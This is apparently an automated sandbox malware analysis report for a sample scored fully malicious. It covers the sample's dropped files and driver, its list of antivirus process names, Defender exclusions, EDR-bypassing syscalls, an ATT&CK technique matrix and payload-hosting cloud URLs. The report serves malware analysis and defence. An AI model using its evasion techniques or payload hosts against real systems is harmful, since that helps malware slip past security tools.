Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Users\user\Documents\J8daaU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
Source: svchost.exe, 00000006.00000002.2415557811.000001F5ACD02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KWatch.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SuperKiller.exe
Source: Amcache.hve.54.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
Source: Amcache.hve.54.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.54.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmp, Amcache.hve.54.drBinary or memory string: MsMpEng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: J8daaU.exe, 00000037.00000002.2413710220.000000EAE25FF000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 360safe.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413547290.000000EAE24FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: svchost.exe, 00000006.00000002.2415557811.000001F5ACD02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: J8daaU.exe, 00000008.00000002.1541397720.000001811F7E9000.00000002.00001000.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2416912722.000002B875829000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Windows Service
22
Masquerading
1
Credential API Hooking
271
Security Software Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter
1
Scheduled Task/Job
11
Process Injection
2
Disable or Modify Tools
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop Protocol1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
1
DLL Side-Loading
1
Scheduled Task/Job
1
Modify Registry
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
Abuse Elevation Control Mechanism
31
Virtualization/Sandbox Evasion
NTDS3
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
11
Process Injection
LSA Secrets133
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Abuse Elevation Control Mechanism
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Obfuscated Files or Information
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639725 Sample: Gokod.763652.06.exe Startdate: 16/03/2025 Architecture: WINDOWS Score: 100 64 xh4ffp.oss-cn-beijing.aliyuncs.com 2->64 66 sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 2->66 68 4 other IPs or domains 2->68 76 Malicious sample detected (through community Yara rule) 2->76 78 Multi AV Scanner detection for submitted file 2->78 80 PE file contains section with special chars 2->80 82 3 other signatures 2->82 8 Gokod.763652.06.exe 1 24 2->8         started        13 J8daaU.exe 20 2->13         started        15 J8daaU.exe 2->15         started        17 13 other processes 2->17 signatures3 process4 dnsIp5 70 sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.59, 443, 49724, 49725 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 8->70 54 C:\Windows\Temp\aceprocted.sys, PE32+ 8->54 dropped 56 C:\Users\user\Documents\eToken.dll, PE32+ 8->56 dropped 58 C:\Users\user\Documents\J8daaU.exe, PE32+ 8->58 dropped 90 Drops PE files to the document folder of the user 8->90 92 Sample is not signed and drops a device driver 8->92 94 Tries to detect virtualization through RDTSC time measurements 8->94 72 sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.98, 443, 49736, 49737 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 13->72 60 C:\Program Files (x86)\4xCNoe\4xCNoe.exe, PE32 13->60 dropped 96 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 13->96 98 Found direct / indirect Syscall (likely to bypass EDR) 13->98 19 cmd.exe 1 13->19         started        22 cmd.exe 1 13->22         started        24 cmd.exe 1 13->24         started        32 3 other processes 13->32 100 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->100 74 127.0.0.1 unknown unknown 17->74 62 C:\Program Files (x86)\u0syUl\u0syUl.exe, PE32 17->62 dropped 102 Changes security center settings (notifications, updates, antivirus, firewall) 17->102 104 Uses cmd line tools excessively to alter registry or file data 17->104 26 reg.exe 1 1 17->26         started        28 reg.exe 1 1 17->28         started        30 reg.exe 1 1 17->30         started        34 9 other processes 17->34 file6 signatures7 process8 signatures9 84 Uses cmd line tools excessively to alter registry or file data 19->84 86 Uses schtasks.exe or at.exe to add and modify task schedules 19->86 36 conhost.exe 19->36         started        46 3 other processes 19->46 38 conhost.exe 22->38         started        48 3 other processes 22->48 40 conhost.exe 24->40         started        50 3 other processes 24->50 88 Adds extensions / path to Windows Defender exclusion list (Registry) 26->88 42 conhost.exe 32->42         started        52 7 other processes 32->52 44 conhost.exe 34->44         started        process10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Gokod.763652.06.exe17%VirustotalBrowse
Gokod.763652.06.exe17%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\4xCNoe\4xCNoe.exe0%ReversingLabs
C:\Program Files (x86)\u0syUl\u0syUl.exe0%ReversingLabs
C:\Users\user\Documents\J8daaU.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://xh4ffp.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
http://www.extensis.com/meta/FontSense/0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpges0%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgstory0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-510%Avira URL Cloudsafe
http://prismstandard.org/namespaces/prismusagerights/2.1/0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgetCache0%Avira URL Cloudsafe
https://downloads.hawe.com/7/0/D7000TUV-de.pdf)0%Avira URL Cloudsafe
https://downloads.hawe.com/7/0/D7000E1-de.pdf)0%Avira URL Cloudsafe
http://jbotsim.sf.net/examples/bico.html)/S/URI0%Avira URL Cloudsafe
https://www.hawe.com/de-de/kontakt/kontaktsuche/)0%Avira URL Cloudsafe
https://downloads.hawe.com/5/4/D54881-de.pdf)0%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgJv0%Avira URL Cloudsafe
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline0%Avira URL Cloudsafe
https://downloads.hawe.com/7/7/D7710TUEV-de.pdf)0%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002w~0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgbu0%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002E0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/drops.jpg0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/.o0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg?0%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/7-2476756634-10020%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/20%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/om0%Avira URL Cloudsafe
https://downloads.hawe.com/3/7/D3726-de.pdf)0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpges0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/fo0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/70%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/Windows0%Avira URL Cloudsafe
https://downloads.hawe.com/7/7/D7710MV-de.pdf)0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/Windows0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgu.aliyuncs.com/0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/.a(0%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/v0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/e0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/al0%Avira URL Cloudsafe
https://xh4ffp.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-10020%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/f.dat0%Avira URL Cloudsafe
https://nm25.oss-cn-hangzhou.aliyuncs.com/f.datjpgW_0%Avira URL Cloudsafe
https://downloads.hawe.com/5/4/B5488-de.pdf)0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
118.178.60.98
truefalse
    unknown
    sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
    39.103.20.59
    truefalse
      high
      xh4ffp.oss-cn-beijing.aliyuncs.com
      unknown
      unknownfalse
        unknown
        nm25.oss-cn-hangzhou.aliyuncs.com
        unknown
        unknownfalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://xh4ffp.oss-cn-beijing.aliyuncs.com/d.giffalse
          • Avira URL Cloud: safe
          unknown
          https://xh4ffp.oss-cn-beijing.aliyuncs.com/i.datfalse
          • Avira URL Cloud: safe
          unknown
          https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://xh4ffp.oss-cn-beijing.aliyuncs.com/a.giffalse
          • Avira URL Cloud: safe
          unknown
          https://xh4ffp.oss-cn-beijing.aliyuncs.com/c.giffalse
          • Avira URL Cloud: safe
          unknown
          https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://nm25.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://xh4ffp.oss-cn-beijing.aliyuncs.com/s.datfalse
          • Avira URL Cloud: safe
          unknown
          https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://nm25.oss-cn-hangzhou.aliyuncs.com/f.datfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.extensis.com/meta/FontSense/Gokod.763652.06.exefalse
          • Avira URL Cloud: safe
          unknown
          https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgstoryJ8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgesJ8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Gokod.763652.06.exefalse
            high
            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://dx.doi.org/10.1016/j.comcom.2011.09.008Gokod.763652.06.exefalse
                high
                http://prismstandard.org/namespaces/prismusagerights/2.1/Gokod.763652.06.exefalse
                • Avira URL Cloud: safe
                unknown
                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://g.live.com/odclientsettings/ProdV2.C:edb.log.1.dr, qmgr.db.1.drfalse
                    high
                    http://dx.doi.org/10.1016/j.comcom.2011.09.008)/S/URIGokod.763652.06.exefalse
                      high
                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000002.00000003.1379724150.000002336DE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380482497.000002336DE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395720938.000002336DE81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://g.live.com/odclientsettings/Prod.C:edb.log.1.dr, qmgr.db.1.drfalse
                          high
                          https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgetCacheJ8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgJ8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.bingmapsportal.comsvchost.exe, 00000002.00000002.1395519765.000002336DE13000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380482497.000002336DE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000001.00000003.1208743106.000001F3856C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.drfalse
                                  high
                                  https://downloads.hawe.com/7/0/D7000TUV-de.pdf)Gokod.763652.06.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://jbotsim.sf.net/examples/bico.html)/S/URIGokod.763652.06.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000002.00000003.1379854194.000002336DE5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.hawe.com/de-de/kontakt/kontaktsuche/)Gokod.763652.06.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://downloads.hawe.com/7/0/D7000E1-de.pdf)Gokod.763652.06.exefalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineGokod.763652.06.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000002.00000003.1379724150.000002336DE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://downloads.hawe.com/5/4/D54881-de.pdf)Gokod.763652.06.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.ver)svchost.exe, 00000001.00000002.2416629749.000001F385400000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://nsis.sf.net/NSIS_ErrorErrorGokod.763652.06.exefalse
                                            high
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395625269.000002336DE59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://xh4ffp.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002w~Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://downloads.hawe.com/7/7/D7710TUEV-de.pdf)Gokod.763652.06.exefalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://dynamic.tsvchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgJvJ8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
